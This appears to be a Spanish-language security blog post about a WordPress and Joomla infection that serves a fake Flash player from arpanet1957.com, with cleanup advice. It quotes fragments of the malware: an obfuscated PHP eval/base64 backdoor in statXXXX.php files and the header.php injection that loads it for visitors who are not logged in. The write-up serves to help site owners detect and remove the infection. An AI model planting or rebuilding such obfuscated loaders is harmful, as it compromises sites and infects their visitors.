Sitios maliciosos detectados por Chrome y Google Safe Browsing – Vulnerabilidad WordPress, Joomla y otros CMS – Arpanet1957 – Fake flash

Nuevas vulnerabilidades detectadas en los CMS -como WordPress y Joomla– ponen en peligro diversos sitios web.

Esta vulnerabilidad es reconocida por cambiar el código (incluyendo llamadas a arpanet1957.com) para descargar un «fake flash player» con virus y así infectar la PC, notebook u otro dispositivo y continuar con su propia distribución

Las llamadas a la URL arpanet1957.com y otras las realiza de forma encriptada. De este modo, resulta muy difícil que pueda ser encontrada mediante una simple búsqueda.

Se encripta dentro de archivos llamados statXXXX.php, donde XXXX cambia al azar como, por ejemplo, stat9cc.php. Estos archivos son guardados habitualmente en wp-includes/js u otras ubicaciones.

El contenido de los archivos statXXXX.php es el siguiente:

/*
<?php

$zhuhqyw=chr(97).»\x73″.chr(115).»e».chr(114).»\x74″;
$umkmshac=»\x62″.»a».»s».chr(101).»6″.chr(52).chr(95).»\x64″.chr(101).chr(99).»o».»d».»\x65″;

@$zhuhqyw(
@$umkmshac(
‘ZXZhbChiYXNlNjRfZGVjb2RlKCdEUW8vUGp3L2NHaHdEUW9qSXlNakl5TWpJeU1qSXlNakl5TWpEUW8vUGp3L2NHaHdEUW9
[continua…]

 

Los archivos statXXXX.php son llamados como script de JS:

<script language=JavaScript src=/wp-includes/js/stat9cc.php ></script>

o con una compleja llamada desde código PHP como la siguiente:

<?php $_3dbb03fe=1;if( !(function_exists(«is_user_logged_in») && is_user_logged_
in()) && !(function_exists(«is_admin») && is_admin()) ) {echo »
<script language=JavaScript id=onDate ></script>
<script language=JavaScript src=/wp-includes/js/stat9cc.php ></script>
«;};$_3dbb03fe=1; ?>

 

Desde archivos PHP o JS: estas llamadas suelen verse en el archivo header.php de temas de wordpress, en la ubicación wp-content/themes/twentyfifteen y en otros temas.

También en este archivo header.php pueden verse directamente llamadas a funciones encriptadas como:

<?php $ydeaabh = ’64]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]
32M3]31fw6*CW&)7gj6<.[A x27&6< x,;#-#}+;%-qp%)54l} x27″))) { $llkzlzo = »
x63 162 x65 141 x74 145 x5f 146 x75 156
x63 164 x#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}
334}472 x24<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s7pd%6<C x27pd%6|6.7eu{66~67<&w6<
*&7-#o]s]o]s]#)fepm%w6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%!2p%!|!*!***b%)sfx
pmpusut!-#j0#!/!**#sf
[continua…]

 

o la clásica desde PHP con la función:

eval(base64_decode(‘.[A x27&6< x,;#-#}+;%-qp%)54l} x27

 

Para eliminar esta vulnerabilidad, es necesario eliminar los archivos comprometidos statXXXX.php y las llamadas desde header.php. Luego, deberá actualizar el CMS o levantar un backup y actualizar el CMS.

 

La recomendación más importante de todas es mantener actualizado tanto el CMS  Wordpress y Joomla como todos sus componentes y sus temas.

 

Deja una respuesta